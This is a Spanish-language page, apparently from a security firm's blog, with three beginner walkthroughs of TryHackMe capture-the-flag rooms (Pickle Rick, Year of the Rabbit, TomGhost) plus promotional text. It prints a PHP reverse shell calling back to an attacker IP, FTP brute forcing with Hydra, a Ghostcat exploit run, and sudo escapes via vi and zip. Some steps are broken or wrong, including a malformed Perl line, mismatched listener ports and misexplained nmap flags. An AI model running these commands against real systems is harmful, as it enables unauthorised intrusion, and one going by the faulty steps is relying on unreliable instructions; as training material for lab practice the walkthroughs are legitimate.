En este manual, te guiaré a través de los pasos necesarios para realizar un pentesting en la máquina “Pickle Rick Try Hack Me https://tryhackme.com/room/picklerick“. Este tutorial está dirigido a personas que se están iniciando en el pentesting, por lo que explicaré los puntos más importantes y te mostraré cómo utilizar las herramientas clave durante el proceso. Asegúrate de seguir cada paso cuidadosamente para obtener resultados exitosos.

Paso 1: Actualizar el sistema operativo

Antes de comenzar con el pentesting, es crucial asegurarse de tener el sistema operativo actualizado. Ejecuta el siguiente comando para actualizar el sistema y sus paquetes a las versiones más recientes disponibles:

apt update && apt upgrade

Este comando garantiza que estés utilizando las últimas actualizaciones de seguridad y las versiones más recientes de los paquetes.

Paso 2: Preparar el entorno para Pickle Rick Try Hack Me

Crea una carpeta dedicada para trabajar con la máquina y asegúrate de tener todos los archivos relacionados en ella. Por ejemplo:

mkdir maquina
cd maquina

Esto creará una carpeta llamada “maquina” y te moverá al directorio recién creado.

Paso 3: Recopilar datos en un archivo de texto

Durante el proceso de pentesting, es esencial mantener un registro de los datos que encuentres. Crea un archivo de texto nuevo para almacenar la información relevante. Por ejemplo:

touch datos.txt

Esto creará un archivo de texto llamado “datos.txt” que puedes utilizar para guardar y organizar los hallazgos importantes.

Paso 4: Añadir la IP de la máquina al archivo host para Pickle Rick Try Hack Me

Para facilitar el acceso a la máquina, agregaremos su dirección IP al archivo de hosts de nuestro sistema. Esto se puede lograr modificando el archivo /etc/hosts y agregando una entrada para la dirección IP de la máquina.

Paso 5: Verificar la conectividad y el TTL

Antes de comenzar el escaneo de puertos, es importante verificar la conectividad con la máquina víctima y obtener información básica sobre ella. Utiliza el siguiente comando para enviar un paquete de ping a la dirección IP de la máquina:

ping -c 1 <ipmaquina>

Esto enviará un único paquete de ping a la dirección IP especificada. Luego, puedes verificar el TTL (Time To Live) en la respuesta del ping para obtener información adicional sobre la máquina.

Pickle Rick Try Hack Me Ping

Paso 6: Escaneo inicial con nmap de Pickle Rick Try Hack Me

El siguiente paso es realizar un escaneo inicial de puertos en la máquina utilizando la herramienta nmap. Ejecuta el siguiente comando:

nmap -A <ipmaquina> -oN nmap_picklerick_inicial

Este comando ejecuta un escaneo detallado de todos los puertos abiertos en la máquina y guarda los resultados en un archivo llamado “nmap_picklerick_inicial”. El parámetro -A activa la detección de versiones y la detección de servicios.

Pickle Rick Try Hack Me Nmap

Paso 7: Inspeccionar directorios con Gobuster

Para descubrir posibles directorios ocultos o archivos en la web de la máquina, utilizaremos la herramienta Gobuster. Ejecuta el

siguiente comando:

gobuster -u http://<ipmaquina> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py

Este comando realiza un escaneo utilizando una lista de palabras clave contenida en el archivo “directory-list-2.3-medium.txt”. La herramienta buscará archivos con las extensiones php, sh, txt, cgi, html, css, js y py.

Pickle Rick Try Hack Me Gobuster

Paso 8: Acceder a archivos encontrados y realizar inyección de comandos

Después de realizar el escaneo con Gobuster, es posible que hayas encontrado archivos como “robots.txt” y “login.php”. Accede a estos archivos utilizando un navegador web o herramientas como curl o wget. Si encuentras una posible contraseña en alguno de los archivos, tómala nota y guárdala en tu archivo de datos para referencia futura.

Pickle Rick Try Hack Me Username
Pickle Rick Try Hack Me Password

Paso 9: Realizar un shell inverso en Pickle Rick Try Hack Me

Si has identificado un punto de inyección de comandos en la máquina, puedes aprovecharlo para establecer un shell inverso. Utiliza el siguiente comando PHP, reemplazando “ATTACKING-IP” por tu dirección IP de ataque:

php -r '$sock=fsockopen("ATTACKING-IP",4444);exec("/bin/sh -i <&4 >&4 2>&4");'

Este comando abrirá una conexión de red hacia tu máquina y ejecutará un shell interactivo en la máquina víctima.

Pickle Rick Try Hack Me Php Reverse Shell

Paso 10: Escuchar el shell inverso

En tu máquina de ataque, abre un programa como Netcat para escuchar la conexión de shell inverso. Utiliza el siguiente comando:

nc -nvlp 1234

Esto abrirá una escucha en el puerto 1234 para recibir la conexión de shell inverso desde la máquina víctima.

Pickle Rick Try Hack Me Netcat

Paso 11: Elevar los privilegios a root

Una vez dentro de la máquina víctima a través del shell inverso, ejecuta el siguiente comando para ver las opciones de sudo disponibles:

sudo -l

Esto mostrará las opciones de sudo disponibles para el usuario actual. En este caso tenemos elevación de privilegios con perl y el archivo backup.pl

cat backup.pl #!/usr/bin/perl
system("sh, "/etc/copy.sh");

Ahora tendrás control total sobre la máquina como root.

Pickle Rick Try Hack Me Sudo

Paso 12: Búsqueda de ingredientes Pickle Rick Try Hack Me

Como usuario root en la máquina víctima, realiza una búsqueda de los tres ingredientes necesarios en los directorios relevantes utilizando comandos como find o grep. Guarda todos los hallazgos en tu archivo de datos para referencia futura.

¡Enhorabuena! Has completado el proceso de pentesting y has hackeado con éxito la máquina Pickle Rick.

Resumen

En este tutorial, hemos seguido una serie de pasos para realizar un pentesting en la máquina Pickle Rick. Comenzamos actualizando el sistema operativo, configurando el entorno de trabajo y recopilando datos en un archivo de texto. Luego, realizamos un escaneo de puertos con nmap, inspeccionamos directorios con Gobuster y accedimos a archivos encontrados. Utilizamos un shell inverso para obtener acceso a la máquina víctima, elevamos nuestros privilegios a root y buscamos los ingredientes necesarios. Al seguir estos pasos, logramos hackear con éxito la máquina Pickle Rick y obtener control total sobre ella.

¡Únete a DCSeguridad en Telegram!

Si estás interesado en el campo de la ciberseguridad y deseas obtener más información, te invitamos a unirte a nuestro canal de Telegram. En DCSeguridad, nos especializamos en ofrecer soluciones y servicios de seguridad avanzados para proteger tus activos digitales. No dudes en ponerse en contacto con nosotros para obtener asesoramiento o ayuda con tus necesidades de seguridad.

¡Asegúrate de visitar nuestro sitio web para obtener más información!

Manual paso a paso Year of the Rabbit TryHackMe

Manual paso a paso Year of the Rabbit TryHackMe

Hoy traemos el Manual de Pentesting para principiantes en la plataforma Year of the Rabbit TryHackMe URL: https://tryhackme.com/room/yearoftherabbit

Year of the Rabbit TryHackMe

Paso 1: Preparación

Lo primero que debemos hacer es crear un directorio de trabajo para realizar el pentesting. Esto nos ayudará a mantener organizados todos los archivos y resultados generados durante el proceso.

mkdir yearoftherabbit
cd yearoftherabbit

A continuación, debemos añadir la dirección IP de la máquina objetivo al archivo de hosts para poder acceder a ella fácilmente.

sudo nano /etc/hosts

Agrega la siguiente línea al final del archivo, reemplazando <ipmaquina> con la dirección IP de la máquina objetivo:

<ipmaquina> yearoftherabbit.thm

Guarda los cambios y cierra el editor.

Paso 2: Identificación del sistema operativo de Year of the Rabbit TryHackMe

Antes de comenzar el escaneo de puertos, es útil confirmar la conectividad y determinar el sistema operativo de la máquina objetivo. Para ello, realizaremos un ping y observaremos el valor TTL en la respuesta.

ping -c 1 yearoftherabbit.thm

Si el valor TTL es 63, es probable que estemos ante una máquina Linux.

Year Of The Rabbit Try Hack Me Ping

Paso 3: Escaneo de puertos

El siguiente paso es realizar un escaneo de puertos en la máquina objetivo para identificar los servicios disponibles. Utilizaremos la herramienta Nmap para esto.

nmap -p- --open -sSCV --min-rate 5000 -vvv -n -Pn yearoftherabbit.thm -oN nmap_yearoftherabbit

Explicación de los comandos y flags utilizados:

  • -p-: Escanea todos los puertos.
  • --open: Muestra solo los puertos abiertos.
  • -sS: Realiza un escaneo TCP SYN.
  • -C: Realiza un escaneo con scripts de enumeración básica.
  • -V: Aumenta el nivel de detalles de la versión del servicio.
  • --min-rate 5000: Limita la velocidad de envío de paquetes para evitar la detección.
  • -vvv: Muestra una salida detallada.
  • -n: No realiza resolución de DNS.
  • -Pn: Ignora la detección de hosts y trata todas las direcciones IP como en línea.
  • -oN nmap_yearoftherabbit: Guarda la salida en un archivo llamado “nmap_yearoftherabbit”.

Este escaneo nos mostrará los puertos abiertos y los servicios correspondientes, como el FTP (puerto 21), SSH (puerto 22) y Apache (puerto 80).

Year Of The Rabbit Nmap1

Paso 4: Inspección del FTP y la web de Year of the Rabbit TryHackMe

Ahora que conocemos los puertos abiertos, podemos realizar una inspección de los directorios de la web utilizando la herramienta wfuzz. Esto nos permitirá descubrir posibles rutas y archivos interesantes.

wfuzz -c --h=404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://yearoftherabbit.thm:80/FUZZ

Explicación de los comandos y flags utilizados:

  • -c: Coloriza la salida.
  • --h=404: Ignora las respuestas 404 (no encontradas).
  • -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt: Utiliza un archivo de palabras para realizar la enumeración de directorios.
  • -u http://yearoftherabbit.thm:80/FUZZ: Especifica la URL objetivo y usa “FUZZ” como comodín para reemplazarlo con las palabras del archivo.
Year Of The Rabbit Wfuzz

Este comando buscará directorios y archivos en la web y mostrará cualquier resultado interesante. Accedemos a el y vemos lo siguiente.

Year Of The Rabbit Directorio

Paso 5: Investigación del directorio oculto

En el paso anterior, hemos encontrado un directorio oculto. Para obtener más información sobre este directorio, ya que nos redirige a otra página, utilizaremos la herramienta Burp Suite. Burp Suite nos permitirá interceptar y analizar el tráfico HTTP.

Year Of The Rabbit Java

Abre Burp Suite e importa el certificado raíz en tu navegador siguiendo las instrucciones proporcionadas por la herramienta.

Configura tu navegador para usar el proxy de Burp Suite y visita la URL del directorio oculto encontrado en el paso anterior. Examina cuidadosamente las respuestas y los elementos presentes en la página para obtener información adicional.

Year Of The Rabbit Burpsuite

Paso 6: Descarga y análisis de una imagen en Year of the Rabbit TryHackMe

En el directorio oculto, encontramos una imagen que puede contener información oculta. Descargaremos la imagen utilizando la herramienta wget.

wget http://yearoftherabbit.thm:80/imagen.jpg
Year Of The Rabbit Imagen

Luego, analizaremos la imagen en busca de información oculta utilizando la herramienta binwalk.

binwalk imagen.jpg -e --run-as=root

Explicación de los comandos y flags utilizados:

  • -e: Extrae los archivos incrustados en la imagen.
  • --run-as=root: Ejecuta binwalk con privilegios de root para acceder a archivos restringidos.

Binwalk nos mostrará cualquier archivo oculto o información incrustada en la imagen.

Year Of The Rabbir Try Hack Me Binwalk

Paso 7: Análisis de los archivos extraídos

Ahora que hemos extraído los archivos incrustados en la imagen, utilizaremos el comando cat para ver el contenido de cada archivo y buscar información relevante.

cat archivo1.txt
cat archivo2.txt
...

Uno de los archivos puede contener una serie de contraseñas y un usuario de FTP.

Year Of The Rabbit Try Hack Me Cat

Paso 8: Guardar las contraseñas

Guardaremos las posibles contraseñas en un archivo llamado “contraseñas.txt” para su posterior uso.

nano contraseñas.txt

Copia las contraseñas encontradas en el paso anterior y péguelas en el archivo. Guarda los cambios y cierra el editor.

Year Of The Rabbit Try Hack Me Ftp User

Paso 9: Ataque de contraseña a FTP de Year of the Rabbit TryHackMe

Utilizaremos la herramienta Hydra para realizar un ataque de fuerza bruta al servidor FTP y descubrir la contraseña.

hydra -l <usuario_ftp> -P contraseñas.txt ftp://yearoftherabbit.thm

Reemplaza <usuario_ftp> con el usuario de FTP encontrado en los pasos anteriores.

Hydra intentará diferentes contraseñas utilizando la lista proporcionada en el archivo “contraseñas.txt”.

Year Of The Rabbit Try Hack Me Hydra

Paso 10: Descarga y análisis de un archivo en FTP

Una vez hayas obtenido acceso al servidor FTP, descarga cualquier archivo que encuentres relevante utilizando el comando get archivo.txt. Luego, sal del servidor FTP y analiza el contenido del archivo descargado mediante el comando cat.

ftp year

oftherabbit.thm
get archivo.txt
exit
cat archivo.txt
Year Of The Rabbit Try Hack Me Ftp

Paso 11: Decodificación de un archivo codificado en Brainfuck

Si el archivo descargado está codificado en Brainfuck, accede al sitio web https://www.dcode.fr/brainfuck-language y pega el contenido del archivo en el campo de entrada. Luego, haz clic en “Decode” para obtener el mensaje decodificado.

Year Of The Rabbit Try Hack Me Brainfuck

Paso 12: Acceso SSH utilizando las credenciales obtenidas a Year of the Rabbit TryHackMe

Una vez hayas decodificado el archivo y obtenido las credenciales de SSH, utiliza el siguiente comando para acceder a la máquina objetivo.

ssh <usuario>@yearoftherabbit.thm

Reemplaza <usuario> con el usuario obtenido.

Year Of The Rabbit Try Hack Me Ssh 1

Paso 13: Lectura de un archivo oculto para otro usuario

Una vez hayas accedido por SSH, busca y lee el archivo oculto mencionado en el mensaje utilizando el comando cat.

cat archivo_oculto.txt

En este archivo encontrarás una nueva contraseña para otro usuario.

Year Of The Rabbit Try Hack Me Ssh2

Paso 14: Escalada de privilegios en Year of the Rabbit TryHackMe

Sal del usuario actual utilizando el comando exit y accede nuevamente por SSH utilizando las nuevas credenciales obtenidas en el paso anterior.

ssh <otro_usuario>@yearoftherabbit.thm

Reemplaza <otro_usuario> con el usuario obtenido.

Year Of The Rabbit Try Hack Me User Flag

Paso 15: Escalada de privilegios con sudo en Year of the Rabbit TryHackMe

Verifica los privilegios disponibles utilizando el comando sudo -l. Observa si existe alguna oportunidad para escalar privilegios mediante el comando vi.

sudo -l

En este caso, se observa que es posible escalar privilegios mediante el comando vi.

Year Of The Rabbit Try Hack Me Sudo L

Paso 16: Escalada de privilegios con sudo y vi en Year of the Rabbit TryHackMe

Aprovecha una vulnerabilidad en la versión de sudo para escalar privilegios ejecutando el siguiente comando:

sudo -u#-1 /usr/bin/vi user.txt

Esto permitirá ejecutar el editor vi con privilegios de root y acceder al archivo “user.txt”.

Paso 17: Obtención de acceso root

Una vez dentro del editor vi, ingresa :!/bin/sh y presiona Enter. Ahora tendrás acceso root a la máquina objetivo.

Recuerda que realizar pruebas de penetración en sistemas o redes sin permiso y autorización es ilegal. Asegúrate siempre de obtener el consentimiento del propietario del sistema o red antes de realizar cualquier actividad de pentesting.

Try Hack Me Sudo 11
Year Of The Rabbit Try Hack Me Sudo 4

Resumen Year of the Rabbit TryHackMe

En este manual, hemos llevado a cabo el pentesting de la máquina Year of the Rabbit de la plataforma Try Hack Me. Comenzamos preparándonos creando un directorio de trabajo y agregando la máquina objetivo al archivo de hosts.

A continuación, realizamos una identificación del sistema operativo utilizando el comando ping y observando el valor TTL. Luego, llevamos a cabo un escaneo de puertos utilizando la herramienta Nmap para descubrir los servicios y puertos abiertos en la máquina.

Realizamos una inspección de los directorios de la web utilizando la herramienta wfuzz, buscando posibles directorios ocultos. Utilizamos Burp Suite para investigar un directorio oculto y obtener más información.

Descargamos y analizamos una imagen encontrada en el directorio oculto utilizando las herramientas wget y binwalk. Exploramos los archivos extraídos y examinamos su contenido.

Guardamos las contraseñas encontradas en un archivo y utilizamos la herramienta Hydra para realizar un ataque de fuerza bruta al servidor FTP y descubrir la contraseña. Descargamos y analizamos un archivo del servidor FTP.

Decodificamos un archivo codificado en Brainfuck utilizando un sitio web especializado. Accedimos por SSH utilizando las credenciales obtenidas y leímos un archivo oculto para otro usuario.

Realizamos una escalada de privilegios aprovechando una vulnerabilidad en sudo y vi. Finalmente, obtuvimos acceso root a la máquina objetivo.

¡Únete a DCSeguridad y contáctanos hoy mismo!

DCSeguridad es una empresa líder en el campo de la seguridad informática y el pentesting. Nuestro equipo de expertos altamente calificados y con amplia experiencia está listo para ayudarte a proteger tu infraestructura digital.

Si estás interesado en fortalecer la seguridad de tu empresa, te invitamos a que te pongas en contacto con nosotros. Ofrecemos servicios personalizados y soluciones integrales para proteger tus sistemas contra posibles amenazas y vulnerabilidades.

Además, te invitamos a unirte a nuestro canal de Telegram, donde compartimos contenido exclusivo sobre seguridad informática, consejos, últimas tendencias y noticias del mundo de la ciberseguridad. Es una excelente oportunidad para mantenerte actualizado y aprender de los mejores en el campo.

En DCSeguridad, entendemos la importancia de la seguridad en la era digital y estamos comprometidos en brindarte soluciones confiables y efectivas. No escatimamos esfuerzos para asegurar la confidencialidad, integridad y disponibilidad de tu información.

¡No esperes más y protégete con DCSeguridad! Contáctanos hoy mismo y únete a nuestro canal de Telegram para acceder a un mundo de conocimiento y seguridad digital.

Recuerda que el pentesting debe realizarse siempre con permiso y autorización.

Manual paso a paso Cat Pictures 2 TryHackMe

Resolución Tomghost TryHackMe CTF Paso a Paso easy

¡Bienvenido al manual de Pentesting para principiantes en TomGhost TryHackMe! En esta guía, aprenderás los pasos básicos para realizar una prueba de penetración en la máquina TomGhost de la plataforma TryHackMe. A continuación, te explicaré los comandos y herramientas utilizadas en cada paso.

Paso 1: Comprobación de la conectividad

Para comenzar, es importante comprobar la conectividad con la máquina objetivo. Ejecuta el siguiente comando en tu terminal:

ping -c 1 <ipmaquina>

Este comando envía un paquete de solicitud de eco (ping) a la dirección IP de la máquina objetivo y espera una respuesta. Si recibes una respuesta exitosa, significa que tienes conectividad con la máquina.

Tomghost Tryhackme Ping

Paso 2: Escaneo de puertos básico

Realizaremos un escaneo de puertos básico utilizando la herramienta nmap. Ejecuta el siguiente comando:

nmap -p- <ipmaquina> -oN nmap_tomghost_nmap_basico

El comando nmap se utiliza para explorar los puertos abiertos en una máquina. En este caso, estamos escaneando todos los puertos disponibles en la máquina objetivo y guardando los resultados en el archivo “nmap_tomghost_nmap_basico”.

Durante el escaneo, se identificaron los siguientes puertos abiertos y servicios correspondientes:

  • Puerto 22: Servicio SSH.
  • Puerto 53: Servicio DNS.
  • Puerto 8009: Desconocido.
  • Puerto 8080: Servicio HTTP.
Tomghost Nmap 1

Paso 3: Escaneo de puertos detallado

Ahora realizaremos un escaneo de puertos más detallado utilizando nmap. Ejecuta el siguiente comando:

nmap -p 22,53,8009,8080 -sCVS --min-rate 5000 -v -n <ipmaquina> -oN nmap_tomghost_completo

Este comando realiza un escaneo exhaustivo en los puertos específicos que hemos seleccionado y guarda los resultados en el archivo “nmap_tomghost_completo”.

Durante el escaneo, se encontraron los siguientes servicios:

  • Puerto 22: OpenSSH 7.2p (Servicio SSH seguro).
  • Puerto 8080: Apache Tomcat 9.0.30 (Servidor de aplicaciones web).
Tomghost Tryhackme Nmap2

Paso 4: Búsqueda de vulnerabilidades en Apache Tomcat

En este paso, buscaremos vulnerabilidades conocidas en la versión de Apache Tomcat que hemos identificado (9.0.30). Para ello, clonaremos un repositorio de GitHub que contiene un exploit específico. Ejecuta el siguiente comando:

git clone https://github.com/dacade/CVE-2020-1938.git

Este comando clona el repositorio “CVE-2020-1938” desde GitHub. El exploit contenido en este repositorio nos ayudará a buscar vulnerabilidades en Apache Tomcat.

Paso 5: Preparación del exploit para su ejecución

Antes de ejecutar el exploit, debemos asegurarnos de que el archivo sea ejecutable. Utiliza el siguiente comando:

chmod u+x tomcat.py

Este comando otorga permisos de ejecución al archivo “tomcat.py”, lo que nos permitirá ejecutarlo en el siguiente paso.

Tomghost Tryhackme Gitclone

Paso 6: Ejecución del exploit en Apache Tomcat

Ahora es el momento de ejecutar el exploit en Apache Tomcat utilizando el archivo “tomcat.py” que hemos preparado. Ejecuta el siguiente comando:

python3 tomcat.py <ipmaquina> -f /WEB-INF/web.xml -p 8009

En este comando, reemplaza <ipmaquina> con la dirección IP de la máquina objetivo. El exploit intentará aprovechar la vulnerabilidad en Apache Tomcat utilizando la ruta del archivo “/WEB-INF/web.xml” y el puerto “8009”.

Durante la ejecución del exploit, se mostrarán posibles credenciales de acceso a la máquina.

Tomghost Tryhackme Exploit

Paso 7: Acceso por SSH utilizando las credenciales encontradas

Ahora que tenemos posibles credenciales de acceso, podemos intentar acceder a la máquina objetivo a través de SSH. Utiliza el siguiente comando:

ssh usuario@<ipmaquina>

Reemplaza <ipmaquina> con la dirección IP de la máquina objetivo y proporciona la contraseña correspondiente cuando se solicite.

Una vez que hayas accedido a la máquina, podrás explorar el directorio y encontrar dos archivos: uno con extensión “.pgp” y otro con extensión “.asc”. Descargaremos estos archivos para trabajar con ellos y descifrarlos.

Tomghost Tryhackme Ssh1

Paso 8: Creación de un servidor HTTP en la máquina objetivo

Para descargar los archivos desde la máquina objetivo, necesitamos configurar un servidor HTTP en la máquina objetivo. Ejecuta el siguiente comando:

python3 -m http.server

Este comando utiliza el módulo http.server de Python para crear un servidor HTTP en la máquina objetivo. Esto nos permitirá descargar archivos desde la máquina objetivo a nuestro equipo atacante.

Tomghost Tryhackme Httpserver

Paso 9: Descarga de archivos desde la máquina atacante

Ahora podemos descargar los archivos necesarios desde la máquina objetivo. Utiliza el siguiente comando:

wget <ipmaquina>:8000/archivos

Reemplaza <ipmaquina> con la dirección IP de la máquina objetivo. Este comando utiliza la herramienta wget para descargar el directorio “archivos” desde el servidor HTTP en la máquina objetivo a tu equipo atacante.

Tomghost Tryhackme Wget

Paso 10: Desencriptación de archivos

Los archivos que hemos descargado están encriptados. Para desencriptarlos, seguiremos los siguientes pasos:

  1. Convierte el archivo “.asc” en un formato compatible con “John the Ripper” utilizando el siguiente comando:
   gpg2john tryhackme.asc > hash

Este comando convierte el archivo “tryhackme.asc” en un formato que puede ser utilizado por “John the Ripper” y guarda los resultados en el archivo “hash”.

Tomghost Tryhackme Gpg2john
  1. Utiliza “John the Ripper” junto con un diccionario de contraseñas para intentar descifrar el archivo encriptado. Ejecuta el siguiente comando:
   john --wordlist=/ruta/diccionario hash

Asegúrate de reemplazar “/ruta/diccionario” con la ruta correcta de tu diccionario de contraseñas.

Tomghost Tryhackme John

Paso 11: Importación y desencriptación de archivos GPG

Una vez que hayas descifrado el archivo, importa la clave pública GPG desde el archivo “tryhackme.asc” a la lista de claves GPG utilizando el siguiente comando:

gpg --import tryhackme.asc

Luego, utiliza el siguiente comando para desencriptar el archivo “credential.pgp” utilizando la clave privada correspondiente:

gpg --decrypt credential.pgp
Tomghost Tryhackme Gpg

Paso 12: Acceso nuevamente por SSH con las nuevas credenciales

Ahora que tenemos las nuevas credenciales, podemos intentar acceder a la máquina objetivo nuevamente utilizando SSH. Ejecuta el siguiente comando:

ssh merlin@<ipmaquina>

Reemplaza <ipmaquina> con la dirección IP de la máquina objetivo y proporciona la contraseña correspondiente cuando se solicite.

Tomghost Tryhackme Ssh2

Paso 13: Captura de la primera bandera

Una vez que hayas accedido a la máquina como usuario “merlin”, puedes capturar la primera bandera ejecutando el siguiente comando:

cat user.txt

Este comando muestra el contenido del archivo “bandera1.txt”, que contiene la primera bandera obtenida durante el acceso como usuario “merlin”.

Paso 14: Escalada de privilegios

Para realizar una escalada de privilegios, ejecuta el siguiente comando para verificar los privilegios disponibles para el usuario actual:

sudo -l

Este comando muestra los privilegios disponibles para el usuario actual y verifica si se tiene permiso para ejecutar comandos con privilegios de root. En este caso, encontramos la siguiente línea: “(root : root) NOPASSWD: /usr/bin/zip”.

Tomghost Tryhackme Sudo

Paso 15: Escalada de privilegios con “zip”

Ahora que hemos identificado una posible forma de escalada de privilegios utilizando “zip”, podemos aprovecharla. Seguiremos los siguientes pasos:

  1. Visita la página https://gtfobins.github.io/gtfobins/zip/#sudo para obtener información sobre cómo utilizar “zip” para obtener privilegios de root.
  2. Utiliza el siguiente comando para ejecutar la escalada de privilegios:
   TF=$(mktemp -u)
   sudo zip $TF /etc/hosts -T -TT 'sh #'

Este comando utiliza la vulnerabilidad en la configuración de “sudoers” para ejecutar el comando “zip” con privilegios de root. Crea un archivo temporal único y utiliza “sudo zip” para comprimir el archivo “/etc/hosts” y ejecutar un shell interactivo (“sh”) con privilegios de root.

Tomghost Tryhackme Root

Paso 17: Captura de la última bandera

Una vez que hayas obtenido privilegios de root, puedes capturar la última bandera ejecutando el siguiente comando:

cat root.txt

Este comando muestra el contenido del archivo “root.txt”, que contiene la última bandera obtenida como usuario root.

Resumen TomGhost TryHackMe

En resumen, hemos realizado un proceso de pentesting en la máquina “tomghost” de TryHackMe. Los pasos seguidos fueron los siguientes:

  1. Comprobación de la conectividad con la máquina objetivo.
  2. Escaneo de puertos básico utilizando Nmap.
  3. Escaneo de puertos detallado para obtener información adicional sobre los servicios.
  4. Búsqueda de vulnerabilidades en Apache Tomcat utilizando un exploit específico.
  5. Preparación y ejecución del exploit en Apache Tomcat.
  6. Acceso por SSH utilizando las credenciales obtenidas.
  7. Descarga de archivos desde la máquina objetivo.
  8. Desencriptación de archivos utilizando GPG.
  9. Acceso nuevamente por SSH con las nuevas credenciales.
  10. Captura de la primera bandera.
  11. Escalada de privilegios utilizando la vulnerabilidad en “sudoers” y el comando “zip”.
  12. Captura de la última bandera como usuario root.

Esta experiencia nos permitió adquirir conocimientos sobre el proceso de pentesting, desde la exploración y escaneo de puertos hasta la escalada de privilegios en un entorno controlado.

Recomendación de DCSeguridad

¡Te invitamos a ponerte en contacto con DCSeguridad y unirte a nuestro canal de Telegram!

DCSeguridad es una empresa líder en servicios de seguridad informática y pentesting. Nuestro equipo de expertos en seguridad puede ayudarte a proteger tu infraestructura y aplicaciones contra amenazas cibernéticas.

Te animamos a ponerte en contacto con nosotros para obtener más información sobre cómo podemos asegurar tu empresa y brindarte soluciones personalizadas. Únete a nuestro canal de Telegram para recibir las últimas actualizaciones y consejos de seguridad.

No dejes que tu empresa sea vulnerable a ataques cibernéticos. Confía en DCSeguridad para fortalecer tu seguridad y proteger tus activos digitales.

¡Contáctanos hoy mismo y mantén tu negocio seguro en el mundo digital!